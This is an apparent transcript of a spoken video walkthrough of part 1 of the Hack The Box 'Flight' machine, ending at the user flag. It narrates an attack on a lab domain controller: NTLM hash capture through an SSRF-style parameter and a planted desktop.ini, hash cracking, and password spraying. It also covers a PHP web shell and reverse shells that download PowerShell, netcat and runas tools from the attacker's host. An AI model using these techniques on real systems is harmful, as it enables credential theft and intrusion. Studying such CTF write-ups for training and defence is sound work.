Hello everyone, welcome back guys. Hope you all are doing well. This is Mohammad Badruddin and today we are going to solve a machine from Hackthebox. The machine name is Flight and the difficulty level of this machine is hard. So without wasting time, let's jump to the nmap scan. So first of all, first thing first, nmap space hyphen s capital V for version enumeration, space hyphen s capital C for default scripts, and the IP of the target machine is 10.10.11.187, and I want to save the scan results in a file named as default.nmap. I already ran the scan to save the time, so I'm directly going to show you the scan results which is in default.nmap. So there are a bunch of ports open, and by seeing these ports I can easily find that this machine belongs to Windows, and also it may be a domain controller. Why? Because as you can see here, the Kerberos sec port is open. Okay, LDAP port is open, fine, TCP rep and K password. These ports tell me that this machine, this target machine, could be a domain controller. Fine. So without wasting time, I'm just going to access the port number 80. I already created a record in my etc host file with flight.htb. As you can see here, this is the domain name, flight.htb. Fine. But before that, an interesting part here for SMB. So as you can see, there is another sign that this target machine is going to be, the server is using the Windows server operating system or network operating system. Here as we can see that SMB signing is enabled and required. In client operating system is not required, but in server operating system the SMB signing is enabled and required. So that also tells me that this is going to be the server and most probably is going to be the domain controller. So we will see that in a minute, but because I already created a record, so as you can see, I can access this application, web application by name from flight.htb, right? Before going further, it's always better to have to run some enumeration process like directory enumeration and subdomain enumeration in the backend. So I'm going to use FUF for subdomain enumeration. So it's going to be FUF space -w for the word list. I'm going to use user share sec list. Okay, inside seclist there is discovery, inside discovery there is DNS, and inside DNS there is subdomain top 1 million dot text, and then I'm going to put the URL, which is going to be http://flight.htb space -header. The header I'm going to use is going to be the host header. So inside single quotes host, and because I'm going to because I'm going to enumerate subdomain, so I'm going to write here fuzz.fly.htb, and let's say number of threads are going to be 100, and let's hit enter, Control C. So all of these showing the same status code, which is 200, but we can filter the size and word. So if we have different size or different word, we can go with that. So let's go and let's just tune this command for FUF. So clear it, and I'm going to say space -fs 7069 and just hit enter. Okay, let it run and let's go. We see the first of all page source. Let's see if there is anything interesting in the page source. So any plugin or anything, not here. Let's see what comes to the webalizer. HTTP Apache server, OpenSSL, it's using PHP 8.1.1. This is important information, and as you can see, the server is Windows server. Fine, that's very good. So we found some interesting information. We can try uh, try to register or plan our trip here, but anything you do is a dead link. So as you can see here, this is a dead link. Our aircraft, dead link, dead link, dead link, all of these are dead link, right? If I try to go to news, everything is dead link. So go back here, and as you can see, we found one new subdomain, and this is school. So let's open this. We find subdomain, and the subdomain is going to be school. Okay. Now I'm going to create another record in my etc host file, which is going to be echo school dot flight dot htb, and I'm going to append, okay, this to etc/host file. Okay, so now, oh sorry, this is bad. I must say here 10.10. Come on, it should be like this, 10.10.11.187. okay, now if I try to open this subdomain, school.flight.htb, so there is another application hosted on this subdomain, and as you can see here, there are few buttons like home. So if we click on home, there is index.php, and there is a parameter view, and it's viewing this page. Fine, home.html. So when I see this, why not, let's try to read something like what, like index.php, and yeah, as you can see here, there is something, suspicious activity blocked, echo incident will be reported, and there is some code. So I'm going to see the view page source, view page source, and if we scroll down, this is the page source from here up to here, right? Not too much interesting. There is htaccess. Okay, there are filters. Okay, we can read file, but the suspicious activity is blocked. That means some kind of filter or sanitizer mechanism is there, or detection mechanism is there, right? So let's try to read etc host file, and again suspicious activity is blocked. Okay, let's try for ssrf, maybe http:// first of all, I'm going to start the Python http server, python 3 space -m http.server on port number 80. Go back here, and my IP is 10.10.14.119, as you can see here, /aaa. Let's hit enter and go back to the terminal, and let's see whether we get hit or not. And as you can see, we get hit here. So if we can get hit here, we can try a few things, like what, let's see, I'm going to start the responder space -I for the interface, and the interface is tunnel 0. Hit enter and make sure your SMB server is on, right? And HTTP server is also on. So we can try now what, we can try the same one more time, and let's see if we can capture the hashes or not. So this time we are not getting anything. Let's try to access the SMB, because SMB server is on the responder. So let's try this. Instead of AAA, let's see CCC, whatever. Okay, and come back here, scroll down, there is anything, 10.10.14.119, 10 10 14 119 10 10 14 119, nothing. Let's see, I can access this or not. Ping 10.10.11.187. Yeah, I can ping it. Back here, school.htb. Let's see. Okay, so now it's okay, fine. Let's go back and try one more time. So 10.10.14.119, this is my IP /AAA or whatever. Hit enter. Let's see this time we get it or not. 10.10.14.119. Yeah, this time it comes. So this is skipping previously captured hash for flight /svc Apache. Okay, and the username is svc_Apache. The hash of this user is already actually captured before by me by responder. So it's already in the log. That's why it's saying skipping previously captured hash. So if you are doing it first time, you will get here the hashes. But if you already capture this hash, where you will find it, you can go to cd/user share responder. Inside responder, there is a folder logs, ls -la, and this one, because this is the target IP 10.10.11.187. So I'm going to cat and paste it. Okay, hit enter. So this is the hash for svc Apache. Okay, I already capture it, so that is the hash. Whether you take this one or this one, and I'm going to say nano hash, hit enter, paste it here, save it, Control X, clear it, and let's go to crack this hash. So hashcat space -m and 5600, I think its code is 5600. So hashcat wiki, these are the example hashes. So this is actually the NTLM version 2 hash. So if I say Control F and let's say NTLM v2, so you can see this is the code for NTLM version 2. So 5600, I'm going to crack it here. Hashcat space -m 5600, file name is hash. Okay, and user share word list, this is going to be word list. I'm going to use rocku.txt. Just hit enter. Okay, so it is going to crack the hash. What is it? Take this, copy, come back here, let's copy this here. Nano hash, paste that, cat hash. So this is the hash, fine. Let's see, clear hashcat space -m 5600 space, the file name is going to be hash, and the word list is going to be user share word list and rocku.txt. Because I already cracked the hash this before, so it's telling us if you want to see the cracked hash, you just need to use the -- show switch. Okay, so if you are doing this, if you are cracking it first time, it will take maybe 5 minutes, or it depends on your computing power, maybe 5 to 10 minutes. But if you already crack it, you can see it by using the switch -- show. So this is the password for svc Apache user, right? I'm going to copy this, come back here. Username is svc_Apache and password is going to be this. Fine. So I'm going to copy this password, come back here. I don't need this, so I'm going to clear it. Also, I don't need that. Clear this. Back here. Let's see, because the shares SMB port was open. Cat default.nmap 445 port was open, so I'm going to try to access the SMB shares with SMB client space hyphen capital L to list the shares. 10.10.11.187 space hyphen U for the user, and the username is svc_apache. Hit enter. It will ask you for the password. I already copied the password, so I'm going to just paste it. Hit enter. No, nothing is there. Let's see. Copy svc apache and Control Shift V to paste the password. Yeah, maybe I copy something else. Now, as you can see, there are a bunch of shares. So these are the default shared. This is not default. Okay. Syslog, this is also interesting. Users and web. Okay. Let's try to access some share instead of listing. Let's try to access the first one is shared. Paste the password. What was that? Okay. Actually, here we need to access like this. Okay, ls, and there is nothing in this share. So I'm going to exit from here and clear it. Let's try another, which is going to be your users. Paste the password. Okay, ls. Okay, there are bunch of users. All users, administrator, svc_apache is there. So let's see inside svc_apache. Nothing. There is another user which is cbum. Okay, let's see. Cd all users. Symlink. We can go to, let's try lsc.bum. Is there anything? Not much. Okay, so exit it. Now we know the svc apache password, so let's try to execute the impacket ps exec to get the reverse shell. Okay, so impacket ps exec. Okay, and the name is flight/svc_apache, and the password is going to be that, and then @10.10.11.187. So here, as you can see, it is trying to see all the shares, and it is actually detecting whether any of these share is writable or not. So if any of these share is writable, it is going to upload the malicious payload on that share. But unfortunately, with this user svc apache, it does not find any writable share. Okay, so we need to go further, and what we can do, because we know one user which is svc apache, and also we know its password, so we are going to try to enumerate the users first. Crack map exec. So crack map exec smb, let's say the machine name, which is flight.htb, okay, space -u svc underscore apache, okay, and space -p for password, and password is going to be this, then space -- users. So this space -- user switch is going to enumerate the users by crackmap exec default username file. So hit enter and hope for the best. Okay, this is the same user what we have, and we already know the password for this, but let's see if we find another users or not. So as you can see, we get other users, and all these user name is here. So o.possum, v steves, d truff, I francis, w walker, c bump. We already saw this user before in the share, c bump. So that means this is the trusted result, because there is the user which we already see in the share. Okay, and there is one more user which is curb tgt, and this is confirming that this target machine is going to be the domain controller, and it is the KDC, which is key distribution center service account, Kerberos, right? So okay, we have all these usernames. You can take all these username and create a file named as username.txt or whatever you want. I already have this file here, created this file, which is users.txt. If I show you cat users.txt, so you can see all these usernames I already write here to save the time. Okay, now what I'm going to do, I'm going to see whether any of these, because password reuse is a very common vulnerability we see. Okay, so I want to see whether the same password is used with any of these user or not. Okay, so clear it, and I'm going to again use crackmap exec, okay, not -- users, and instead of username I'm going to put here the username list, which is users.txt. okay, hit enter. Let's see. Okay, so it found one password, one username that is using this password, but once it get any user who is using this password, it is going to stop there. So for that we need to use something. Let's see, what was the switch? Crack map exec smb -- help. Yeah, this one, continue on success. So if it found any user using the same password, then it is not going to stop there, it is going to check all of the users. So continue on success, we need this one, copy, come back here and just paste that. Okay, this one. So hit enter. Let's see what we have now. Now as you can see, it gets one user with the password, but it's not stopped there, it's checking all of the users, and all these users are in this file. Okay, and up to now it did not find any user who is using this password. Yeah, but here we found one. So s.moon, this user s.moon is using the same password. So I'm going to copy this back here again, username, paste that, and password, right? So we can now use smoon user with this password. So copy that. Now I want to see one more time the same thing by using psexec. Because now we have one more user, and maybe this user is the privileged user. Maybe we get the reverse shell. So impacket psexec, okay, flight slash, instead of svc we need to say smoon colon password and at the rate target IP, which is going to be this. Hit enter. Let's see. Okay, not writable. As you can see, these shares are not writable, but it found one. So the shared folder is writable. It found this folder is writable, and then it tried to upload the malicious payload, but because of some error or maybe some restriction or firewall or access denied, as you can see here, it won't be able to upload this malicious payload successfully. But important part here is this share is writable. So if it is writable, that means we can write or we can upload or we can put something in this share. And the thing is, suppose if we upload some malicious exe file in this share, and someone or any of these user, so any of these user if access that malicious payload, we are going to get the reverse shell. Okay, but the thing is, in that case, that user must be execute that exe, right? So there are few more technique with that. Even on just accessing the share, just opening the share folder, we can also get the reverse shell. So for that we can use few techniques by uploading file like ini file, scf file and url file. Okay, so if I show you here, payload all the things scf file, active directory attack, open share, as you can see here, scf file and url file attack against the writable share. Fine. So if I go there, you can see we can create a file and we can just upload this file in the share, and whenever someone come to access the share, we will get the hashes like url file. There is one more, which is ini file. Because I try all these scf and url file, but I get success by uploading ini file. So let me see, writable share abuse by ini file. Hack tricks. Yeah, this is the good one. ini, and here if you search ini, here the first link desktop.ini, stealing NTLM credentials, and here it is desktop.ini. Okay, so this is the file which we can create. So I'm going to create it. Come back here. Nano desktop.ini. Okay, and paste it here. Shellcode info. Copy that, come back here and paste this. Now here we will just change the IP address, which is 10.10.14.119. This is my IP address. Control X, cat desktop.ini. Fine. Now what we need to do here is the first thing first, clear that, and I'm going back to cd/desktop, and inside desktop the folder name is flight. Clear it. Here I'm going to start the responder space hyphen capital I, and the interface name is tunnel 0. Hit enter. Come back here, and I'm going to access SMB client. Okay, instead of this I'm going to say s.moon user. Okay, because by s.moon user we find by impacket psexec that this shared folder is writable. So come back here, I'm going to copy this password, copy that back here, paste it, hit enter. Okay, ls, nothing is there. Now I'm going to put desktop.ini, hit enter, it's there. Now come back here, let's see if we find something or not. So we just need to wait a bit until a user access this share, and then we will get the okay. So c.bum user, we get the hash for this user c.bum, and because I already captured this hash, so it's not showing us here the hash, but we get it. So if we go back here, let's exit this one, and cd/user share responder, inside responder logs ls space hyphen la, and this is the log file. To copy this, cat paste, so c.bum, this is the user. Okay, so we get the hash here. Now I'm going to just copy this hash, and again I'm going to say back again to the directory. Where is it? cd/desktop. Inside desktop we have flight and nano. Inside nano I'm going to say bum hash and paste that. Control X, cat bum hash, and this is the hash, and this is again the NTLM version 2 hash. So with hash cat I'm going to crack it, and the ID is 5600 bum hash, and the word list, which is going to be user share word list rocku.txt. Let it run. And there we go, we get the password for this user. So I'm going to copy it back again here. Let's say username is going to be c.bum, password is going to be this. Okay, back here, clear it. Now let's try to access another share. SMB client, instead of that space hyphen capital L and s.bum, hit enter. Now just paste the password. What was the password? c.bum, this is the password. Copy and c.bum, not s.bum. Paste the password, and these are the shares. Now this time I'm going to try to access this share. So clear that, SMB client The share name is web space hyphen capital U for the username, which is c.bum. Hit enter. Come back here. This is the password. Paste that password. Hit enter. And now we are in the web share, and there are two web directories, because we know there are two web applications hosted. One is on flight.htb, another one is on subdomain school.flight.htb. Okay, so let's see what is inside flight.htb. There is nothing. So because this application is running on PHP, these both applications running on PHP, so what we can do, we can create a reverse shell, PHP reverse shell, and we can access that. So for this, the first thing first, I'm going to create a text file to just test whether we can upload a file here and access through this browser or not. So let's say echo, this is a test document, and put it in test.txt. Okay, now come back here, and here I'm going to put this test.txt. okay, it's there. If I do ls, so we have, oh okay, cd flight.htb, and here we need to put test.txt. okay, because before we are in the root directory, not inside flight.htb. now we are in. So if I do ls, and this time we have test.txt, right? So come back here, here, and let's say test.txt. oh, come on, back, test.txt, and as you can see, we can access it. So if we can create a web command shell, so if we can upload here a command shell, we can access that command shell, and then we can execute the commands. So I'm going here, let's say rev shell, reverse shell generator. Okay, so my IP is 10.10.14.119, and let's say port number 4545. Go to PHP command. This is the command shell. Okay, so I'm going to take this one, copy that, back here again, and this time I'm going to say nano hell.php and paste that here. Control O, enter, Control X, clear this. Let's access the web share again with cbum user, and this is the password. Copy this password, paste it here, hit enter. Now go to the flight.htb directory, and we can put here hell.php, hit enter. Now it's there. What we need to do now is just take out this one. Let's say hell.php question mark cmd is equal to who am I. This is any command what we want to execute, and as you can see, this is flight svc apache user. That means we are svc apache user. Let's say dir command, what's inside this directory. So there are hell.php, index.html, and as you can see, test.txt, right? And we are inside c examp htdocs and flight.htb directory. So that means we can now execute commands, and if we can execute commands, we can get the reverse shell here. So I'm going to get the reverse shell by using nishang shell. So if you go to file system opt nishang, Inside Nishang there are shells. Inside shell I'm going to use this one, invoke PowerShell TCP PS1. So I'm going to copy this back again to desktop in the flight, and I'm going to paste this. Okay, now open this. Wait, first of all I need to change the name, so rename it, let's say well.ps1. okay, open this file and I'm going to use this first one. So copy this and scroll down up to the last, and here I need to put this. For the reverse shell I just need to change the IP to my IP and the port number, let's say 7575, and save this. So well.ps1 is saved. Now I'm going to back here, I don't need this, clear, and let's say nc space hyphen nlvp. I'm going to start the reverse shell listener on port 7575 with netcat. Now back again here. Now we can execute, we can upload the well.ps1 Nishang shell. So PowerShell IEX, and here we are going to say new hyphen object space net dot web client dot download strings strings or string, let's try string. Okay, and here we need to also, in the same directory we also need to python space hyphen m http dot server on port 8080, hit enter back here, so that we can upload the file. So 10.10.14.119 colon 8080 slash, the file name was well.ps1. okay, that's it. So execute this, and back here we get hit or not, port number 8080. Nope, we are not getting anything. Let's see whether the file is there or not. ls well.ps1 is there. Here we get anything? No. Let's see ls, because our file is deleted from here. I'm going to put hell.php again. Okay, now let's execute this PowerShell, because maybe our hell.php file was deleted, and this time that seems working, and here we get the hit. Wonderful. And if we come here we get the reverse shell. Fine. So who am I? We are svc Apache. Still we are svc Apache. We are not privileged user like smoon or cbom, but we have here credentials, right? So what we can do, we can actually execute any malicious file by any of these users by using run as utility. Okay, run as utility. But the thing is, when we use run as utility, it prompts for the password. So if we use run as utility here, it is going to ask the password, and here we have the reverse shell as PowerShell, not the CMD. Also, if we have in the CMD, we will get the password prompt, which is not going to be shown here. So this is the thing. So we need to search some tool, run as tool. With that we can actually execute any command or any file using run as, but the password is in the one line command. So run as one liner Okay, or we can also search it like in the GitHub. So there is one. This is the script. Let me see this one. Okay, and let's try this. No, not this one. Control X, GitHub, run as with password, something like this. Let's see this one. Run as with password specified. Usage example, run as.exe /dll whatever, my domain name, username, password, and the file name which you want to execute. So this is what we need. So DL for domain login, P for password, F for file, A for any argument. So we can use this one. Okay, let's see if we have anything else. Dark coder, run as, simple run as program for Windows. Not this one. Peter M run as. Okay, let's see. I'm going to actually initial release. So here we may find exe file. This is run as exe. So I'm going to download this one. Okay. Control X, back here, flight, paste that here. Okay. Here we already have our Python HTTP server running. So come back here. Let's try cert util space hyphen URL cache space hyphen split space hyphen f http :/10.10.14.119 : 8080 / the file name is this one. Copy and back here, paste that, hit enter. Okay, so ls, yeah, run as.exe. So next thing, we need to put here netcat also. Come back here, file system, opt netcat 64-bit. So I'm going to Control C and back here, paste that here. nc64.exe, also download this one. So cert util space hyphen URL cache space hyphen split space hyphen f http : :/10.10.14.119 : 8080 / nc64.exe. Okay, back here, we get a hit here. Okay, both of these files are there, run as and netcat. Fine. Now what I am going to do, horizontal, okay, nc space hyphen nlvp on port number 9001. Okay, and here I am going to execute run as x.exe, and then what was the command for this? We don't need that. dl, so /dl colon flight, okay, slash c dot bum, this is the username, then p for password, and the password for c dot bum is this one. So copy that, come back here, paste it here, then we need the program to run with /f, and this is going to be the path. So path is already here. I'm going to copy this, paste it here, and here we have nc64.exe space hyphen e, let's say cmd.exe, and 10.10.14.119 space on port 9001, because here we are listening on port 9001. And let's see, yeah, that's the thing. Hit enter. It seems executed and we found no error, but we did not get a reverse shell. Okay, let's try one more time, and this time up to here, paste. Now this time, because we are already in the same path, nc.exe space hyphen e cmd 10.10.14.119 on port number 9001. Hit enter. Okay, verify that the path is correct. Let's say ls. We have all the files or not? So hell.php we have, but rest of the files are deleted. Okay, cd users ls svc apache cd svc underscore apache. Okay, ls, let's put the file here. So certutil, where is it? This one. Paste selection, hit enter. We get it here, nc64.exe. We have nc64.exe. Next, scroll up. We need one more file, which is run as x, this one. Paste selection, hit enter. Okay, ls, we have both of these files. Now we just need to execute this command one more time. This one. Paste selection. Okay, let's take this, paste it here, and nc 64.exe space hyphen e PowerShell .exe 10.10.14.119. This is my IP. On 9001 we are listening. Hope for the best. It's executed, but we are not getting reverse shell. Let's try something else. With password PowerShell invoke run as ps1. I think this one, because we have PowerShell. Okay, I think this one. How we can run this? So username is going to be space hyphen user and then space hyphen password. Login type binary, full path of the module to be executed. Okay. Example, invoke run as username whatever, password is this, document binary, this is the binary. Let's take this one. So see it as raw. Control A, copy, and back here, come back here, clear this one, and nano invoke hyphen run as .ps1. hit enter, paste that here, Control O, enter, Control X, clear. Now let's cert util space hyphen URL cache space hyphen f space hyphen split http://10.10.14.119 :8080 / invoke hyphen run as .ps1. okay, that's here. Let's import the module. So to import the module, dot space dot invoke hyphen run as .ps1. okay, it's imported. Now we just need to execute again the command with invoke. So invoke hyphen run as the username is this, so space user is going to be c dot bum space hyphen capital PASSWORD password, and the password is here. Copy, paste that, space domain. Let's do without domain, just binary we need to execute. So space hyphen binary and without single quote or without anything. So take this because we are here, so paste it here, and inside that we have nc64.exe. Space hyphen argument space hyphen arg s e cmd.exe 10.10.14.119 on 9001. Nope. Let's see something else. Let's see this one. The domain, bypass UAC. This is also approximately same, but here there is parameter for remote. Okay. Username, password, command. There is remote cmd.exe. This command we can execute as remote. Let's try this one. Okay, so go to raw, Control A, copy, come back here, here, this time let's say nano, what is the file name, invoke, run as, copy, paste, hit enter, back here, Control A, copy and paste it here, Control O, enter, Control X, and let's paste this one also. So this is the file name. I'm going to copy it back here again, cert util space hyphen URL cache space hyphen f space hyphen split http colon slash slash 10.10.14.119 8080 slash, oh no, this is bad. Cert util space hyphen URL cache space hyphen f space hyphen split and http colon slash slash, this is my IP on port number 8080 slash, what is the file name, this is the file name. I'm going to copy this back here, paste it, hit enter. Here we get hit, yes, we get hit here. Now back here, ls, this is the one. Okay, so first of all let's import this module. Now the module is imported and we are going to now execute this command. So this command is going to be something like this. Username is c.bum and password is this, copy, paste the password, and we need to, where is it, and now we need to specify the command. So here it's saying command.exe. let's say here PowerShell, okay, space hyphen r for the remote, and this is my IP 14.119 and on 9001 we want reverse shell connection. Hit enter. Is not recognized as the name of commandlet. Why so? What we execute, invoke, run as cs.ps1. Oh, okay, we do not need to specify ps1 because we already imported that. So invoke hyphen run as cs, just this, not ps1, and this is going to be our complete command. A positional parameter cannot be found that accept argument 9001. Let me check one more time. Oh, we need to specify colon here. Okay, so let's take this one up to here, paste it. Now colon 9001, hit enter. Hopefully we get, yes, this time we get it. So minimize this one. Who am I? We are flight c.bump, and if we go to cd/users ls, there is c.bump, so cd c.bump ls, there is desktop, cd desktop ls, okay, there is user.text. This is our first flag, so type user.txt, and this is our first flag. So that's it for this video. This is the part 1 for flight machine. In the next part we are going to escalate our privileges from this user to root user or administrator user. So see you in the next part. Bye.